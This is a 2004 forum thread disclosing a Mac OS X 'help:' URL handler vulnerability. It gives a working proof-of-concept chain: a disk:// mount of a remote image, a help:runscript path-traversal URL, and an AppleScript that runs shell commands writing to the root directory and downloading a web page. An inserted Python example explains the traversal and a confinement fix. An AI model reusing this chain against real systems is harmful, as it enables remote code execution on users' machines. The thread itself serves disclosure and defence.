How to avoid the new 'Help' URL handler vulnerability
Authored by: anjoschu on May 20, '04 08:18:08AM

I would like to chime in that modifying OpnApp.scpt does _not_ suffice.

I have created an exploit that demonstrates just that:

http://www.schuderer.net/pub/secflaw.html

This exploit does not rely on OpnApp.scpt, but brings its own script.

After a few seconds, the left frame mounts a disk image on your machine using a meta refresh with this URL:
disk://schuderer.net/pub/dmgtest.dmg

A few seconds after the disk image has been mounted (up to 20), an AppleScript contained in that disk image will launch.

It tests whether it can create the file sometestfile.txt in your root "/" directory (which it probably cannot if you are not an Admin) and whether it can download an HTML page to your home directory (which it most probably can), then displays a dialog box with the results.

The script doesn't do anything else.

The meta refresh URL that is used is help:runscript=../../../Volumes/dmgtest/testme.scpt



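The runscript parameter in the URL quoted above is a relative path that the help: handler resolves against a directory of its own, and the three ../ segments walk out of that directory to /Volumes, which is why replacing OpnApp.scpt does not help. The Python below is an added illustration, not code from the post or from Apple's Help Viewer, of that resolution and of the normalise-and-confine check a handler should apply instead. The base directory /Library/Documentation/Help is an assumption, chosen three components deep so that the post's URL lands in /Volumes as described; the real Help Viewer directory is not given on this page, and the percent-encoded variant is a constructed input.

```python
"""Added example: why 'help:runscript=../../../Volumes/...' escapes the
handler's script directory, and the confinement check that stops it.
Not code from the post or from Apple's Help Viewer; the base directory
below is an assumption."""
import posixpath
from urllib.parse import unquote

# Hypothetical directory against which the handler resolves a relative
# runscript path.  Chosen three components deep so the URL from the post
# (three '../' segments) lands in /Volumes, as the post describes.
HELP_SCRIPT_BASE = "/Library/Documentation/Help"


def parse_help_url(url):
    """Return the decoded runscript= value of a help: URL, or None if absent."""
    scheme, sep, rest = url.partition(":")
    if not sep or scheme.lower() != "help":
        return None
    for part in rest.split("&"):
        key, eq, value = part.partition("=")
        if eq and key == "runscript":
            # Percent-decode first: %2e%2e is '..' to the file system too.
            return unquote(value)
    return None


def naive_resolve(runscript, base=HELP_SCRIPT_BASE):
    """What a handler that merely joins base and parameter would execute.
    posixpath.normpath collapses the '..' segments lexically, so the result
    shows where the path really points."""
    return posixpath.normpath(posixpath.join(base, runscript))


def safe_resolve(runscript, base=HELP_SCRIPT_BASE):
    """Resolve runscript under base and refuse anything that escapes it.

    Returns the absolute path to run, or None when the request must be
    rejected.  Absolute parameters are rejected outright; relative ones are
    normalised and then required to stay strictly below base.  On a live
    system the normalised path should additionally go through
    os.path.realpath once the file exists, so a symlink placed inside base
    cannot point outside it."""
    if not runscript or runscript.startswith("/"):
        return None
    base_norm = posixpath.normpath(base).rstrip("/")
    candidate = posixpath.normpath(posixpath.join(base_norm, runscript))
    if candidate.startswith(base_norm + "/"):
        return candidate
    return None


def audit(url):
    """Compare what a naive handler and a confined handler would run for url."""
    requested = parse_help_url(url)
    if requested is None:
        return {"requested": None, "naive_runs": None, "hardened_runs": None}
    return {
        "requested": requested,
        "naive_runs": naive_resolve(requested),
        "hardened_runs": safe_resolve(requested),
    }


if __name__ == "__main__":
    # The URL from the post, a constructed percent-encoded twin, and a
    # legitimate request for the script that normally lives in the base.
    for u in ("help:runscript=../../../Volumes/dmgtest/testme.scpt",
              "help:runscript=%2e%2e/%2e%2e/%2e%2e/Volumes/dmgtest/testme.scpt",
              "help:runscript=OpnApp.scpt"):
        print(u, "->", audit(u))
```

The check deliberately normalises before comparing prefixes; comparing the raw string against the base, or stripping only a leading "../", would still let "sub/../../x" or an encoded ".." through.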
Disclaimer: Try this at your own risk.
Authored by: anjoschu on May 20, '04 09:09:20AM
Don't be alarmed, I just wanted to make clear that everyone who tries out my exploit does so at his/her own risk. The exploit is designed to be absolutely non-destructive, but who knows what may happen on different systems.

Don't try this if you already have files called /sometestfile.txt and ~/sometestfile.html containing something important. They will not be overwritten, but data will be appended to them, which hypothetically can render them unusable.

If you would like to take a peek into the AppleScript with Script Editor before trying the exploit to make sure it won't harm your system, the disk image is situated here:

http://www.schuderer.net/pub/dmgtest.dmg
(MD5 (dmgtest.dmg) = f8aa896d52b746b525063c3f8ce29308)

Here is the code of the contained script testme.scpt:


-- Part 1: can the script write to the root of the boot volume?
-- 'do shell script' raises an error on a non-zero exit status, so a
-- refused write drops into the 'on error' branch.
try
	do shell script "echo In my opinion, working under an Administrator account is an unnecessary risk >> /sometestfile.txt"
	set verdict to "you're working as an Admin. That's very bad. I've been able to create the file 'sometestfile.txt' in the root directory of your hard drive. If I were feeling malicious, I could install myself in the StartupItems, delete important system files or do almost anything else I wanted." & return & return
on error
	set verdict to "you're not working as an Admin. Thus my little plot to create a file in the root directory of your hard drive has failed. That's comforting. A little." & return & return
end try

-- Part 2: can the script reach the network and write into the home directory?
try
	do shell script "curl http://www.heise.de >> ~/sometestfile.html"
	set curlresult to "I was able to download the entry page of a popular German IT news site to 'sometestfile.html' in your Home directory. This is just to demonstrate the power of a script like this one."
on error
	set curlresult to "Surprisingly I was unable to download some internet site to 'sometestfile.html' in your Home directory. Do you happen to have a third-party firewall installed or restricted permissions? A good idea if so."
end try

-- Report both results in a single dialog.
display dialog "Hello, I am (mostly) harmless." & return & return & ¬
	"This is a script from a disk image that has been mounted remotely via the URL" & return & ¬
	"  disk://schuderer.net/pub/dmgtest.dmg." & return & ¬
	"This script has been launched via the URL" & return & ¬
	"  help:runscript=../../../Volumes/dmgtest/testme.scpt" & return & return & ¬
	"I've noticed that " & verdict & curlresult buttons {"Ooh, I'm scared!"} default button 1

Paranoia galore! :)
